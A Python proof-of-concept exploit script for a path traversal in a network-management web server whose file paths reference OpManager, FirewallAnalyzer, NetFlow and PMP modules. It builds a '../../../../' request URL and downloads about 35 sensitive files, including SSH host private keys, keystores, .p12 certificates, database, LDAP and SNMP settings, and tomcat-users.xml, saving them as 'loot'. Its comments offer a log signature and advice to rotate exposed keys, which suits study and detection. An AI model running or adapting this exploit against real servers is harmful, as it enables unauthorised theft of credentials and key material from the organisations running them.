POC / exploit.py PY
import os
import argparse
import urllib.error

from urllib.request import urlopen
from random import randint

def save_to_file(data, dest_file):
	"""Write the bytes in data to dest_file, truncating any existing file."""
	# Binary mode: the payload is stored exactly as received, with no
	# newline or encoding translation.
	with open(dest_file, mode="wb") as sink:
		sink.write(data)

def exploit(host, port, target_file, ssl=False):
	"""Request one file through the traversal URL and return the raw body.

	The URL path built here is
	/cachestart/<1-6>/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../<target_file>
	and it is handed to urlopen() with no headers, cookies or credentials
	added by this code.  For defenders, the "../../../../" run following the
	apiclient/fluidicv2/javascript/jquery prefix is the string to search for
	in web access logs or to reject at a reverse proxy.

	host        -- host name or address, placed in the URL unchanged
	port        -- anything int() accepts; left out of the URL when it equals
	               the scheme default (443 for https, 80 for http)
	target_file -- path appended after the traversal sequence
	ssl         -- True selects https, False selects http; a value equal to
	               neither leaves the scheme unset and the call fails with
	               UnboundLocalError

	Returns the response body as bytes.  Exceptions raised by urlopen()
	(for example urllib.error.HTTPError) propagate to the caller.
	"""
	# The number between cachestart/ and cacheend/ is picked at random per
	# request, so a log signature must not pin it to a single value.
	cache_slot = randint(1,6)
	uri = (
		f"/cachestart/{cache_slot}/cacheend/apiclient"
		f"/fluidicv2/javascript/jquery/../../../../{target_file}"
	)

	# Normalise to a decimal string; a non-numeric port raises here.
	port = str(int(port))

	if ssl == True:
		scheme, implied_port = "https", "443"
	elif ssl == False:
		scheme, implied_port = "http", "80"

	# Omit the port when it is the default for the chosen scheme.
	authority = host if port == implied_port else f"{host}:{port}"
	url = f"{scheme}://{authority}{uri}"

	return urlopen(url).read()

def main():
	"""Parse the command line, request each listed file and save the responses.

	Options: -t target host (required), -p port (int, default 8060),
	-d output directory prefix (default "./"), -s "Target uses SSL".
	The -s value is parsed into arg_ssl but is not read below; every request
	is issued with ssl=False, so the traffic this script generates is http.

	Judging by their names, the requested files are key material and
	credential-bearing configuration: SSH host keys, keystores and
	truststores, .p12 bundles, and database, LDAP and SNMP settings.  Where
	access logs show these paths were served, patching the server is not
	sufficient on its own; the keys and passwords they hold need reissuing.
	"""
	cli = argparse.ArgumentParser()

	cli.add_argument('-t', action="store", dest="target", default=None,
		help="Target IP or hostname to exploit")

	cli.add_argument('-p', action="store", dest="port", type=int,
		default=8060, help="Remote port of the target")

	cli.add_argument('-d', action="store", dest="loot_dir", default="./",
		help="Directory to store loot")

	cli.add_argument('-s', action='store_true', dest="arg_ssl",
		default=False, help="Target uses SSL")

	opts = cli.parse_args()

	if opts.target is None:
		print("Error: You must specify the target host with the '-t' flag")
		# os._exit() terminates immediately, without running cleanup handlers.
		os._exit(1)

	# Paths are appended after the traversal sequence, so they are relative
	# to whatever directory the four "../" segments resolve to on the server.
	# The same list doubles as an audit checklist of files whose contents
	# should be considered exposed if the requests succeeded.
	target_files = [
		"bin/.ssh_host_dsa_key",
		"bin/.ssh_host_dsa_key.pub",
		"bin/.ssh_host_rsa_key",
		"bin/.ssh_host_rsa_key.pub",
		"conf/client.keystore",
		"conf/customer-config.xml",
		"conf/database_params.conf",
		"conf/FirewallAnalyzer/aaa_auth-conf.xml",
		"conf/FirewallAnalyzer/auth-conf_ppm.xml",
		"conf/gateway.conf",
		"conf/itom.truststore",
		"conf/netflow/auth-conf.xml",
		"conf/netflow/server.xml",
		"conf/netflow/ssl_server.xml",
		"conf/NFAEE/cs_server.xml",
		"conf/OpManager/database_params.conf",
		"conf/OpManager/database_params_DE.conf",
		"conf/OpManager/ldap.conf",
		"conf/OpManager/MicrosoftSQL/database_params.conf",
		"conf/OpManager/POSTGRESQL/database_params.conf",
		"conf/OpManager/POSTGRESQL/database_params_DE.conf",
		"conf/OpManager/securitydbData.xml",
		"conf/OpManager/SnmpDefaultProperties.xml",
		"conf/Oputils/snmp/Community.xml",
		"conf/Persistence/DBconfig.xml",
		"conf/Persistence/persistence-configurations.xml",
		"conf/pmp/PMP_API.conf",
		"conf/pmp/pmp_server_cert.p12",
		"conf/product-config.xml",
		"conf/SANSeed.xml",
		"conf/server.keystore",
		"conf/server.xml",
		"conf/system_properties.conf",
		"conf/tomcat-users.xml",
		"lib/OPM_APNS_Cert.p12"
	]

	for rel_path in target_files:
		try:
			body = exploit(opts.target, opts.port, rel_path, ssl=False)
		except urllib.error.HTTPError as err:
			# Only HTTP error statuses are handled; other failures, such as
			# a plain urllib.error.URLError, end the run with a traceback.
			print(f"[-] {rel_path} - {err}")
		else:
			# loot_dir is concatenated rather than joined, so it must carry
			# its own trailing separator; '/' in the remote path becomes '|'
			# to give one flat file per entry.
			out_path = opts.loot_dir + rel_path.replace('/', '|').strip()
			save_to_file(body, out_path)

			print(f"[+] {rel_path} saved to {out_path}")

# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
	main()